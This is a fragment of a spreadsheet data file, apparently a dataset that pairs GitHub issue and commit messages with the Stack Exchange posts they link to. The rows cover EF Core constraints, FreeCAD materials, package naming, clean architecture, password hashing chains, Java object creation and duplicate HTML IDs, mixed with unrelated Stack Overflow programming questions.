&lt;p&gt;It is worth mentioning that implementations like the example below cause database errors due to constraint duplicity (as already shown &lt;a href="https://stackoverflow.com/questions/2523397/error-creating-a-table-there-is-already-an-object-named-in-the-database"&gt;elsewhere&lt;/a&gt;). Meanwhile, Microsoft Documentation does not cite any potential constraint conflict (see &lt;a href="https://learn.microsoft.com/en-us/ef/core/modeling/indexes?tabs=data-annotations" rel="nofollow noreferrer"&gt;here&lt;/a&gt;) due to TPC strategy (see &lt;a href="https://learn.microsoft.com/en-us/dotnet/api/system.data.entity.modelconfiguration.configuration.entitymappingconfiguration-1.mapinheritedproperties?view=entity-framework-6.2.0" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, &lt;a href="https://learn.microsoft.com/en-us/ef/ef6/modeling/designer/inheritance/tpt" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, and &lt;a href="https://learn.microsoft.com/en-us/ef/core/modeling/inheritance" rel="nofollow noreferrer"&gt;here&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Constraint Implementation&lt;/strong&gt; (code example)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace MyApplication.DataPersistance
public class Class_A
{
    public DateOnly? C1 { get; set; }
    public DateOnly  C2 { get; set; }
}
public class Class_B : Class_A
{
    // ... other properties
}
public class Class_C : Class_A
{
    // ... other properties
}
public class ApplicationDbContext : IdentityDbContext
{
    public DbSet&amp;lt;Class_A&amp;gt; A { get; set; }
    public DbSet&amp;lt;Class_B&amp;gt; B { get; set; }
    public DbSet&amp;lt;Class_C&amp;gt; C { get; set; }
    // ... other DbSets
    public ApplicationDbContext(DbContextOptions&amp;lt;ApplicationDbContext&amp;gt; options)
        : base(options)
    {
    }
    protected override void OnModelCreating(ModelBuilder modelBuilder)
    {
        base.OnModelCreating(modelBuilder);
        modelBuilder.Entity&amp;lt;Class_A&amp;gt;(entity =&amp;gt; {
             entity.ToTable(b =&amp;gt; b.HasCheckConstraint(&amp;quot;CK_Class_A_C1_gt_C2&amp;quot;, &amp;quot;[C1] &amp;gt; [C2]&amp;quot;));         
             entity.UseTpcMappingStrategy();
        });
        modelBuilder.Entity&amp;lt;Class_B&amp;gt;(entity =&amp;gt; { });
        modelBuilder.Entity&amp;lt;Class_C&amp;gt;(entity =&amp;gt; { });
        // ... configuration of other tables ...
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;So far, the TPC strategy seems to have some limitations regarding database constraint implementations. Nevertheless, I am eager to know Stackoverflow's community opinion and experience in the subject.&lt;/p&gt;
&lt;p&gt;Sincerely,&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C910</t>
  </si>
  <si>
    <t>Materials implementatio
I agree the material setup should be simple for rendering. We could take diffuse color from the already existing entry in the material card in freecad and turn it into a material for all renderers. If they define an IOR, we could also assume they mean a glass and use some default values for the renderer's glass material.
I also don't think we should deprive users from customizing their materials any further. This includes allowing them to specify renderer specific material properties.
Each renderer has specific material properties not really shared by other renderers. This has to do with how the renderer works internally and I haven't found a way to specify something more generally that would include all possible algorithms with their parameters. Let alone the existing "simple ones" currently used by the renderers we support.
I propose if the user wants to input specific parameters for their materials for a renderer, we should allow them. If it's not there, we'll fall back on standard values.
Your code is based on an outdated version of FreeCAD/Render, so it is very difficult to evaluate what you propose in current context. You have to rebase your code on current master before submitting (see here: https://wiki.freecadweb.org/Source_code_management#Rebasing_from_upstream).
Your string operations should be improved/refactored. In particular, repeated string concatenation (operator +) is not recommended in Python, as string is immutable (https://softwareengineering.stackexchange.com/questions/304445/why-is-s-better-than-for-concatenation); moreover, readability of such code is questionable. Instead, you should use string formatting and Format Specification Mini-Language (see here https://docs.python.org/3/library/string.html#formatstrings) to generate pieces of SDL, for instance for matdef. You can look at plugins' current code for examples.
I don't find your MaterialHelper class much useful as-is, as it appears just as a string formatting wrapper around material class. That job should be done inline by plugins - see previous point. However, a MaterialHelper would be useful to implement the logic: for instance, the fallback logic, the material inheritance mechanisms... Indeed, what we send to renderer plugin as a material should just be a dictionary (parameter name/parameter value), and it should be the job of the MaterialHelper to build this dictionary from FreeCAD materials system, looking in the right material cards sections, taking account of material inheritance, fallbacks etc. which we described previously.</t>
  </si>
  <si>
    <t xml:space="preserve">We want to create a widget platform for a particular website.
I couldn't find any articles on doing this, but what I need right now is for someone to point me in the right direction.
What framework should we use? I am proficient with RoR, and okay with Java/.Net, but I don't know if doing this in rails is easy because I can't see how this will be like the usual web application.
A lot of widget platforms allow third party developers to use Javascript. How easy will this be, will we have to create a interpreter or something like that?
What kind of architecture should we follow? Do we store widgets in the database?
</t>
  </si>
  <si>
    <t>Readability. The format string syntax is more readable, as it separates style from the data. Also, in Python,
%s
syntax will automatically coerce any non
str
types to
str
; while concatenation only works with
str
, and you can't concatenate
str
with
int
.
Performance. In Python
str
is immutable, so the left and right string have to be copied into the new string for every pair of concatenation. If you concatenate four strings of length 10, you will be copying (10+10) + ((10+10)+10) + (((10+10)+10)+10) = 90 characters, instead of just 40 characters. And things gets quadratically worse as the number and size of the string increases. Java optimizes this case some of the times by transforming the series of concatenation to use
StringBuilder
, but CPython doesn't.
For some use cases, the logging library provide an API that uses format string to create the log entry string lazily (
logging.info("blah: %s", 4)
). This is great for improved performance if the logging library decided that the current log entry will be discarded by a log filter, so it doesn't need to format the string.</t>
  </si>
  <si>
    <t>C911</t>
  </si>
  <si>
    <t>Rearchitecture
Ideal architecture being:
content
activities
diversions
skills
combat strategies
tasks
achievements
quests
eco
trading
shops
core
client
update
block
sync
entities
player
mob
bot
item
object
combat
map
region
movement
collision
widgets
dialogues
tasks
deferrals
engine
data
cache
storage
game
artemis
loop
queue
event
plugin
script
network
client
encoders
decoders
world
encoders
decoders
Network handlers should be in engine but this will mean some communication will be needed for e.g player count to send to social-server for worlds, and classes such as SyncStage and UpdateBlock to stay inside the engine
https://softwareengineering.stackexchange.com/a/75929/352855
Use the plural for packages with homogeneous contents and the singular for packages with heterogeneous contents.
com.myproject.task.TaskCollection
com.myproject.task.Task
com.myproject.task.TaskHandler
com.myproject.task.TaskFactory
com.myproject.tasks.TakeOutGarbageTask
com.myproject.tasks.DoTheDishesTask</t>
  </si>
  <si>
    <t>Use the plural for packages with homogeneous contents and the singular for packages with heterogeneous contents.
A class is similar to a database relation. A database relation should be named in the singular as its records are considered to be instances of the relation. The function of a relation is to compose a complex record from simple data.
A package, on the other hand, is not a data abstraction.
It assists with organization of code and resolution of naming conflicts. If a package is named in the singular, it doesn't mean that each member of the package is an instance of the package; it contains related but heterogeneous concepts. If it is named in the plural (as they
often
are
), I would expect that the package contains homogeneous concepts.
For example, a type should be named
TaskCollection
instead of
TasksCollection
, as it is a collection containing instances of a
Task
. A package named
com.myproject.task
does not mean that each contained class is an instance of a task. There might be a
TaskHandler
, a
TaskFactory
, etc. A package named
com.myproject.tasks
, however, would contain different types that are all tasks:
TakeOutGarbageTask
,
DoTheDishesTask
, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of Calculators, which each implement a different way to calculate something.&lt;/p&gt;
&lt;p&gt;Say each of those Calculators has a function sum()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type Sum = (numbersToSum: number[]) =&amp;gt; number
type Calculator = {
  sum: Sum,
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I want to have one Calculator that sums exactly 2 numbers and one that sums exactly 3, so I could implement the type as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type TwoNumbers = [number, number]
type ThreeNumbers = [number, number, number]
type Sum = (numbersToSum: TwoNumbers | ThreeNumbers) =&amp;gt; number
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I then implement these functions in a TwoNumberCalculator or ThreeNumberCalculator 'class' I would like to implement these function as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const TwoNumberCalculator: Calculator = {
  sum: (numbersToSum: TwoNumbers) =&amp;gt; numbersToSum[0] + numbersToSum[1],
}
const ThreeNumberCalculator: Calculator = {
  sum: (numbersToSum: ThreeNumbers) =&amp;gt; ...,
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However I get a &lt;em&gt;is not assignable&lt;/em&gt; type error.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TwoNumberCalculator:
numbersToSum: TwoNumbers is not assignable to type TwoNumbers | ThreeNumbers7
ThreeNumberCalculator:
numbersToSum: ThreeNumbers is not assignable to type TwoNumbers | ThreeNumbers
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of course I could just keep&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type Sum = (numbersToSum: number[]) =&amp;gt; number
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to describe the parameter, however having fixed array sizes would be nice, since I sometimes have to access the array elements directly through index.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C912</t>
  </si>
  <si>
    <t>Implement the architecture for this project 
The Clean architecture should be considered
Explain how different between Epic, Features and User Story at https://softwareengineering.stackexchange.com/questions/182158/relationship-between-user-story-feature-and-epic</t>
  </si>
  <si>
    <t>They are very generic term actually. There is many way to interpret them, varying in the literature and how people see them. Take everything I say with a huge grain of salt.
Usually, an Epic comprise a very global and not very well defined functionality in your software. It is very broad. It will usually be broken down into smaller user story or feature when you try to make sense of it and making them fit in an agile iteration. Example :
Epic
Allow the customer to manage its own account via the Web
Feature and User Story are more specific functionality, that you can easily test with acceptance tests. It is often recommended that they be granular enough to fit in a single iteration.
Features usually tend to describe what your software do :
Feature
Editing the customer information via the web portal
User stories tend to express what the user want to do :
User story
As bank clerk,
I want to be able to modify the customer information
so that I can keep it up to date.
I don't think there is really a hierarchy between the two, but you can have one if you want or if it fit how you work. A user story can be a specific justification for a feature, or a specific way to do it. Or it can be the other way around. A feature can be a way to realize a user story. Or they can denote the same thing. You can use both : User stories to define what bring business value and feature to describe constraint of the software.
User story
: as a customer, I want to pay with the most popular credits cards
Feature
support the GOV-TAX-02 XML API of the government.
There is also the question of scenario, which are usually a way a Feature/User story will be executed. They usually map cleanly to a specific acceptance test. For example
Scenario
:
Withdrawing money
Given I have 2000$ in my bank account
When I withdraw 100$
Then I receive 100$ in cash
And my balance is 1900$
That is how we define those terms
where I work
. Those definitions are far from a mathematical definition or a standardized term. Its like the difference between a right wing politician or a left wing politician. It depend where you live. In Canada, what is considered right wing may be considered left-wing in the United State. It's very variable.
Seriously, I wouldn't worry too much about it. The important is that everyone on the team agree on a definition so you can understand each other. Some method like scrum tend to define them more formally, but pick what work for you and leave the rest. After all, isn't agile about
Individuals and interactions over processes and tools
and
Working software over comprehensive documentation
?</t>
  </si>
  <si>
    <t xml:space="preserve">
Duplicate: [external-link]
I think I have found in my recent experience that I design software differently than most of my peers.  I tend to take the incremental bottom up approach after gathering enough requirements to get a high level idea of the components in the software.  
So, in the case of designing an interface that would support multiple concrete classes...I would take a look at what is common to each specific concrete candidate, asking how would I get the job done for each concrete (while thinking about being robust for future concrete).  Then I take that set of commonalities and make an interface, which I believe is a "bottom-up" approach.
In the case of a top down approach I would believe that the designer would look at the client side of the interface and how a client would interact with the interface and then try to implement the concrete classes.  
So I can see advantages and disadvantages of top-down / bottom-up.  I just would like to know which is more efficient and provides a better result based off of your previous experiences? 
Note: I'm not talking about development methodology (agile, waterfall, etc.), I'm talking about design approaches.
</t>
  </si>
  <si>
    <t>C913</t>
  </si>
  <si>
    <t>Improve the clean archtitecture
I am not quite sure if I have already understood the structure well enough
I think the code base way build upon this article but I think there are some improvements to be made:
 the webminer folder should contain all the app logic. here we created a separate flask_server folder. this should be in the webminer folder. the current structure is actually against the clean architecture style
 the naming of the folders and files should be adapted. currently it is way too abstract. this was good for the tutorial in the article, but is not optimal for the project.
the idea of the clean architecture, is basically to keep modularity and uni-directional dependency.
Since this topic is interesting for me, here are further readings:
https://softwareengineering.stackexchange.com/questions/336677/what-is-the-difference-between-mvp-and-clean-architecture
https://8thlight.com/blog/uncle-bob/2012/08/13/the-clean-architecture.html
https://www.codingblocks.net/podcast/clean-architecture-make-your-architecture-scream/
https://github.com/mattia-battiston/clean-architecture-example
https://medium.com/@tiagoflores_23976/how-choose-the-appropriate-ios-architecture-mvc-mvp-mvvm-viper-or-clean-architecture-2d1e9b87d48
https://de.slideshare.net/HimanshuDudhat1/mvp-clean-architecture
https://softwareengineering.stackexchange.com/questions/336677/what-is-the-difference-between-mvp-and-clean-architecture</t>
  </si>
  <si>
    <t>What Bob Martin called "[Clean Architecture][1]" is more a "meta architecture", a high level guideline for creating layered architectures. It does not say anything like 
&gt;  "There must be a Model layer, a View layer and a Presentation layer, and they must be implemented using [MVP][2]", 
it contains only more general rules for the layers like *"dependencies must go from the outer circles to the inner circles, not vice versa"*.  And since in MVP, the View (=UI) might know the Presenter, but the Presenter is decoupled from the View by an interface, MVP is just one of many possible solutions which fulfills this rule. 
Of course, one can use MVP inside a "Clean Architecture" system, but this is not the only one correct approach. Any UI design where the "inner layers" do not know anything special about the UI, and where the UI follows also the other "Clean Architecture" rules described in Bob Martin's article will be fine.
  [1]: https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html
  [2]: https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to export my PyTorch model to ONNX format while ensuring that the batch size remains dynamic. the result always is Segmentation fault (core dumped) Hereâ€™s the code Iâ€™m using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import torch  # Import PyTorch library
# Create a dummy input tensor of shape (1, 3, 256, 256) and move it to the appropriate device
dummy_input = torch.randn(1, 3, 256, 256).to(device)  
# Create dummy camera and view labels, initialized to zeros, and move them to the device
dummy_cam = torch.zeros(1, dtype=torch.long).to(device)  
dummy_view = torch.zeros(1, dtype=torch.long).to(device)  
# Export the model to ONNX format
torch.onnx.export(
    model,  # The PyTorch model to be converted
    (dummy_input, dummy_cam, dummy_view),  # The input tuple
    &amp;quot;deit_transreid_veri.onnx&amp;quot;,  # The output file name
    input_names=[&amp;quot;input&amp;quot;, &amp;quot;cam_label&amp;quot;, &amp;quot;view_label&amp;quot;],  # Naming the input tensors
    output_names=[&amp;quot;output&amp;quot;],  # Naming the output tensor
    dynamic_axes={  # Define dynamic batch size for inputs and outputs
        'input': {0: 'batch_size'},
        'cam_label': {0: 'batch_size'},
        'view_label': {0: 'batch_size'},
        'output': {0: 'batch_size'}
    }, 
    opset_version=13,  # Specify the ONNX opset version
    verbose=True,  # Print detailed information during export
)
print(&amp;quot;Model has been successfully exported to ONNX format!&amp;quot;)  # Confirmation message
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C914</t>
  </si>
  <si>
    <t>Add hashing support for Argon2
@timvisee Your efforts are very welcome (and we have tons of stuff that needs work!) but I think they'd be better spent on another subject.
It's generally a bad idea to mix hashing algorithms. The only legitimate reason for doing this is to hook into an existing system like a forum. There, admittedly, it needs the introduction of a new hash algorithm for it to work.
Given that we sometimes use the configured hash algorithm as an indiciation to perform forum-specific stuff (e.g. XFBCRYPT I think is just bcrypt but it triggers additional work in the data source) I fear that we won't be able to simplify the settings that way.
Bcrypt does a good job of hashing in many iterations. One improvement we can do there is in the settings. I don't think they're clear at all (on mobile, but I think one is called bcryptRoundsLog2 or similar and the comment just restates that xD)
http://softwareengineering.stackexchange.com/a/214451</t>
  </si>
  <si>
    <t>This is more suited on security.stackexchange but...
The problem with
hash1(hash2(hash3(...hashn(pass+salt)+salt)+salt)...)+salt)
is that this is only as strong as the weakest hash function in the chain. For example if hashn (the innermost hash) gives a collision, the entire hash chain will give a collision (
irrespective of what other hashes are in the chain
).
A stronger chain would be
hash1(hash2(hash3(...hashn(pass + salt) + pass + salt) + pass + salt)...) + pass + salt)
Here we avoid the early collision problem and we essentially generate a salt that depends on the password for the final hash.
And if one step in the chain collides it doesn't matter because in the next step the password is used again and should give a different result for different passwords.</t>
  </si>
  <si>
    <t xml:space="preserve">Background
We need to develop a specialised CMS (internal use only) to support a technical writing team producing specialised long-form content for web (i.e. text with pictures, interactive features). To protect the writers from the nitty-gritty of web development (and to improve output consistency) we'd like to augment a regular WSIWYG html editor with parameterised placeholders for more specialised content (e.g. interactive page elements). The placeholders will be expanded into html/js/css/flash/etc by a seperate pre-publication process.
Content generation is the raison d'etre of the business and productivity of the writers is paramount. If we go with a web-based CMS the writers will mutiny, I'm sure of it.
Wishlist
basic web development design surface
cross-platform (mac/windows)
source control integration
ability to add/edit placeholders using a GUI
ability to indicate placeholders on design surface
ability to build our own reports into the UI (e.g. spell-check)
offline editing (i.e. on a plane, at a trade-show)
Options so far
The likelihood of something being flexible enough out of the box is unlikely. So we'll most likely have to extend an existing product. To get offline capability and rock-solid editing we're thinking of extending a desktop app. Here are our options so far:
Dreameaver CS4 (pros: familiar, cross-platform. cons: [external-link])
Visual studio (pros: good extensibility. cons: intimidates writers, mac users will need VM)
Please tell me I have more options than this!
</t>
  </si>
  <si>
    <t>C915</t>
  </si>
  <si>
    <t>Proposal: option to hide dependency APIs if consumers don't reference them too #10375
Cyclicalr dependency issue in components
In JAVA world it's called "Class Shadowing" https://softwareengineering.stackexchange.com/questions/297276/what-is-a-shaded-java-dependency and https://medium.com/@akhaku/java-class-shadowing-and-shading-9439b0eacb13</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the following example, when the button is clicked, &lt;code&gt;cb2&lt;/code&gt; uses the memoized function. However, why doesnâ€™t &lt;code&gt;cb2&lt;/code&gt; use the first render closures (&lt;code&gt;countVal: 0&lt;/code&gt;)?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function TestHook() {
  const [count, setCount] = useState(0)
  let countVal = 0
  const cb = useCallback(() =&amp;gt; {
    console.log('cb dep [count]', count, countVal)
  }, [count])
  const cb2 = useCallback(() =&amp;gt; {
    console.log('cb2 dep []', count, countVal)
  }, [])
  useEffect(() =&amp;gt; {
    cb() // first time: 0, 0 second time: 1, 0 
    cb2() // first time: 0, 0 second time: 0, 1
  })
  const add = () =&amp;gt; {
    console.log('add', count)
    countVal ++
    setCount(count + 1)
  }
  return (
    &amp;lt;&amp;gt;
      &amp;lt;button onClick={add}&amp;gt;add&amp;lt;/button&amp;gt;
    &amp;lt;/&amp;gt;
  );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;br /&gt;
Can anyone explain the result of &lt;code&gt;cb2()&lt;/code&gt; after a re-render?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C916</t>
  </si>
  <si>
    <t>Replaced term "component" with "module".
A module is a bigger building block than a component.
See https://softwareengineering.stackexchange.com/questions/178927/</t>
  </si>
  <si>
    <t xml:space="preserve">I am using a layered architecture with the Entity Framework as my datalayer with a bunch of repositories on top which contain the Linq-To-Entities queries.
The data layer is one project, next to that I have a Services layer and the interface, which is a website.
I want my website to be responsible of specifying the connectionstring for my entity model. How do I do this?
I am using a singleton method to get to my entity repository, which is located inside the datalayer.
Thanks
</t>
  </si>
  <si>
    <t>C917</t>
  </si>
  <si>
    <t>I like to think about software architecture. So using restlet, I've studied architecture of restlet.
And I have some question.
Why did you design Resource instances to be created per-request?
Resource instance created by singleton is more performance than Resource instance created by per-request. also so far as I know, finder of restlet create instance by reflection, it is very harmful for performance.
If you design Resource instance created by singleton, then you maybe need to synchronized to mange singleton instance. Maybe is synchronize more harmful than reflection? So did you design Resource instances to be created per-request?
On the contrary, object creation, even reflective creation, is very
inexpensive in Java, especially when compared to the cost of handling a
network request. See, for example, this question and its answers
&lt;https://softwareengineering.stackexchange.com/questions/149563/should-we-avoid-object-creation-in-java&gt;
for details. (That thread is over five years old, but object creation has
only become *faster* since then.)
Think of the resource instance as the state of handling one request, where
there might be thousands of requests being handled at the same time. Since
that state can be different for each request, you can't have a singleton to
hold this state.</t>
  </si>
  <si>
    <t>Your colleague has no idea what they are talking about.
Your most expensive operation would be listening to them
. They wasted your time mis-directing you to information that is over a decade out of date
(as of the original date this answer was posted)
as well as you having to spend time posting here and researching the Internet for the truth.
Hopefully they are just ignorantly regurgitating something they heard or read from more than a decade ago and don't know any better. I would take anything else they say as suspect as well, this should be a well known fallacy by anyone that keeps up to date either way.
Everything is an Object (except primitives)
Everything other than primitives (
int, long, double
, etc.) are Objects in Java. There is no way to avoid Object creation in Java.
Object creation in Java due to its memory allocation strategies is faster than C++ in most cases and for all practical purposes compared to everything else in the JVM can be considered
"free"
.
Early as in late 1990s early 2000s JVM implementations did have some performance overhead in the actual allocation of Objects. This hasn't been the case since at least 2005.
If you tune
-Xms
to support all the memory you need for your application to run correctly, the GC may never have to run and sweep most of the garbage in the modern GC implementations, short lived programs may never GC at all.
It doesn't try and maximize free space, which is a red herring anyway, it maximizes performance of the runtime. If that means the JVM Heap is almost 100% allocated all the time, so be it. Free JVM heap memory doesn't give you anything just sitting there anyway.
There is a misconception that the GC will free memory back to the rest of the system in a useful way, this is completely false!
The JVM heap doesn't grow and shrink so that the rest of the system is positively affected by free memory
in the JVM Heap
.
-Xms
allocates ALL of what is specified at startup and its heuristic is to never really release any of that memory back to the OS to be shared with any other OS processes until that instance of the JVM quits completely.
-Xms=1GB -Xmx=1GB
allocates 1GB of RAM regardless of how many objects are actually created at any given time. There are some settings that allow for percentages of the heap memory to be release, but for
all practical purposes
the JVM never is able to release enough of this memory for this to ever happen
so no other processes can reclaim this memory, so the rest of the system doesn't benefit from the JVM Heap being free either. An RFE for this was
"accepted"
2006-11-29, but nothing has ever been done about it. This is behavior is not considered a concern by anyone of authority.
There is a misconception that creating many small short lived objects causes the JVM to pause for long periods of time, this is now false as well
Current GC algorithms are actually
optimized
for creating many many small objects that are short lived, that is basically the 99% heuristic for Java objects in every program. Attempts at
Object Pooling
will actually make the JVM perform worse in most cases.
The only Objects that need pooling today are Objects that refer to finite resources that are
external
to the JVM; Sockets, Files, Database Connections, etc and can be reused. Regular objects can not be
pooled
in the same sense as in languages that allow you direct access to memory locations. Object
caching
is a different concept and may or may not be what some people naively call
pooling
, the two concepts are not the same thing and should not be conflated.
The modern GC algorithms don't have this problem because they don't deallocate on a schedule, they deallocate when free memory is needed in a certain generation. If the heap is big enough, then no deallocations happen long enough to cause any pauses.
Object Oriented Dynamic languages are beating C even now days on compute sensitive tests.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;we have migrated a shopware 6.5 shop to 6.6.9.0.
The shop uses elastic search. Since the migration, there have been issues with the elastic search content. Sorting by name,top sellers and more works fine.
But sorting by default price not works.&lt;/p&gt;
&lt;p&gt;Error:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
   &amp;quot;error&amp;quot;:{
      &amp;quot;root_cause&amp;quot;:[
         {
            &amp;quot;type&amp;quot;:&amp;quot;query_shard_exception&amp;quot;,
            &amp;quot;reason&amp;quot;:&amp;quot;No mapping found for [price.c_b7d2554b0ce847cd82f3ac9bd1c0dfca.gross] in order to sort on&amp;quot;,
            &amp;quot;index_uuid&amp;quot;:&amp;quot;Kn7bUfDxQa6aUI3cGOmcPQ&amp;quot;,
            &amp;quot;index&amp;quot;:&amp;quot;sw6dev_product_1739952659&amp;quot;
         }
      ],
      &amp;quot;type&amp;quot;:&amp;quot;search_phase_execution_exception&amp;quot;,
      &amp;quot;reason&amp;quot;:&amp;quot;all shards failed&amp;quot;,
      &amp;quot;phase&amp;quot;:&amp;quot;query&amp;quot;,
      &amp;quot;grouped&amp;quot;:true,
      &amp;quot;failed_shards&amp;quot;:[
         {
            &amp;quot;shard&amp;quot;:0,
            &amp;quot;index&amp;quot;:&amp;quot;sw6dev_product_1739952659&amp;quot;,
            &amp;quot;node&amp;quot;:&amp;quot;wgJLn1yBRIi3AJmogtZPtg&amp;quot;,
            &amp;quot;reason&amp;quot;:{
               &amp;quot;type&amp;quot;:&amp;quot;query_shard_exception&amp;quot;,
               &amp;quot;reason&amp;quot;:&amp;quot;No mapping found for [price.c_b7d2554b0ce847cd82f3ac9bd1c0dfca.gross] in order to sort on&amp;quot;,
               &amp;quot;index_uuid&amp;quot;:&amp;quot;Kn7bUfDxQa6aUI3cGOmcPQ&amp;quot;,
               &amp;quot;index&amp;quot;:&amp;quot;sw6dev_product_1739952659&amp;quot;
            }
         }
      ]
   },
   &amp;quot;status&amp;quot;:400
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have re-indexed several times.
Any ideas?&lt;/p&gt;
&lt;p&gt;Best regards
ottscho&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C918</t>
  </si>
  <si>
    <t>Implement a method that allows the attraction of dependencies through a search strategy.
With dependency lookup, a component must look up the reference to a dependency.
Reference:
https://softwareengineering.stackexchange.com/questions/279500/dependency-injection-vs-dependency-lookup-in-a-layered-architecture</t>
  </si>
  <si>
    <t xml:space="preserve">I am implementing a customer database which lets me search for users and companies, browse and edit their details, and many other things using ASP.NET MVC and javascript (jQuery).
Whenever a post or get occurs, I do that via jQuery.load and insert the PartialView into the DOM. 
Some partial views include forms. I want those to be ajax forms as well, so those partialviews have document.ready handlers that turn the forms into ajax forms (via jquery.form). 
At the beginning I was handling this in the callback / code that inserts the partial view into the DOM. However, this resulted in one big script containing lots of javascript functions that refer to different pages. I refactored the big javascript by inserting the scripts into the respective pages. 
Now the code is sleeker (I have much less OnXXXPartialView handlers) and the code is neatly inside the partial view it belongs to. Most of those files only include 3-4 lines of javascript code, so the overhead is not really significant. 
So effectively I am not only adding elements to the document DOM, but sometimes I am also adding a piece of javascript. In practice this works fine, but it seems [external-link]. 
There are ofcourse workarounds the Firebug issue, but I am wondering whether my architecture may be the real culprit here. Where do you put javascript that belongs to partial views? Is there any best practice?
</t>
  </si>
  <si>
    <t>C919</t>
  </si>
  <si>
    <t>PrimeFaces has a few places where duplicate IDs are present in the DOM
Describe the bug
PrimeFaces has a few places where duplicate IDs are present in the DOM. This issue is to track all of them in 1 spot. Most of the time its in places where PF uses UIColumn to iterate over some advanced rendering but not always.
Why is it bad?
https://softwareengineering.stackexchange.com/questions/127178/two-html-elements-with-same-id-attribute-how-bad-is-it-really</t>
  </si>
  <si>
    <t>Specification says UNIQUE
HTML 4.01 specification
says ID must be document-wide unique.
HTML 5 specification
says the same thing but in other words. It says that ID attributes must be unique amongst all the IDs in the element's
tree
, which is basically the document if we
read the definition of it
.
Avoid duplication
But since HTML renderers are very forgiving when it comes to HTML rendering they
tolerate
duplicate IDs. This should be avoided if at all possible and
strictly avoided
when programmatically accessing elements by IDs in JavaScript. I'm not sure what
getElementById
function should return when several matching elements are found? Should it:
return an error?
return first matching element?
return last matching element?
return a set of matching elements?
return nothing?
But even if browsers work reliably these days, nobody can guarantee this behavior in the future since this is against specification. That's why I recommend you
never duplicate IDs
within the same document.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using this script to fetch minute data from yfinance, which has been working fine until today. Can someone seem to assist me with what may be the issue?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import yfinance as yf
import pandas as pd
def fetch_last_10_days(symbol: str):
    try:
        stock_data = yf.download(symbol, period=&amp;quot;7d&amp;quot;, interval=&amp;quot;1m&amp;quot;)
        if stock_data.empty:
            raise ValueError(f&amp;quot;Failed to fetch data for {symbol}. The data is empty.&amp;quot;)
        print(f&amp;quot;Last 10 days of data for {symbol}:&amp;quot;)
        print(stock_data)
        return stock_data
    except ValueError as ve:
        print(f&amp;quot;ValueError: {ve}&amp;quot;)
    except Exception as e:
        print(f&amp;quot;An unexpected error occurred: {e}&amp;quot;)
    return None  
symbol = 'MSFT'  
data = fetch_last_10_days(symbol)
if data is not None:
    data.to_csv('sample.csv')
else:
    print(&amp;quot;No data to save.&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried re-installing the certificates and YFinance library but nothing works. this is what i see on the console:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;1 Failed download:&lt;br /&gt;
['MSFT']: SSLError(MaxRetryError(&amp;quot;HTTPSConnectionPool(host='fc.yahoo.com', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:997)')))&amp;quot;))&lt;br /&gt;
ValueError: Failed to fetch data for MSFT. The data is empty.&lt;br /&gt;
No data to save.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>C92</t>
  </si>
  <si>
    <t>Fixed RotatePanel class so that is doesn't return errors into the Des
ign Mode GUI causing it to become unusable. The solution was to check if an image is null, and if so load a dummy image. The solution was posted here: https://stackoverflow.com/questions/28805846/netbeans-showing-error-in-design-view-even-though-the-code-is-working-properly</t>
  </si>
  <si>
    <t>I am receiving a null pointer exception error as in the design view but when I run the code it is working perfectly. I can't simply ignore the error because it is making it harder to work in the design view.
How can I fix this or simply remove the error message? I prefer not modifying the code since it is working fine.
Note that I am using lots of customized swing components. Here is a screen capture of the error. Error is not selectable so I can't copy paste it here:
Here is the applyTransparency() method in case it is related
private void applyTransparency() {
    modifiedImg = new BufferedImage(image.getWidth(), image.getHeight(),  BufferedImage.TYPE_INT_ARGB); //line 7
}
Here is how I load the image:
image is send as an argument in the ImgPanel constructor.
public ImgPanel(BufferedImage image) {
    super();
    this.image = image;
    setOpaque(false);
}
I customized the code for the ImgPanel object so that its constructor is called in this manner:
someImgPanel = new gui.customComponents.panels.ImgPanel(GeneralMethods.placeHolderRect(80, 80, Color.RED, "Sleeping", Color.BLUE),0.5f);
GeneralMethods.placeHolderRect() method returns a new BufferedImage that is modified to have a rectangle in it.
Edit
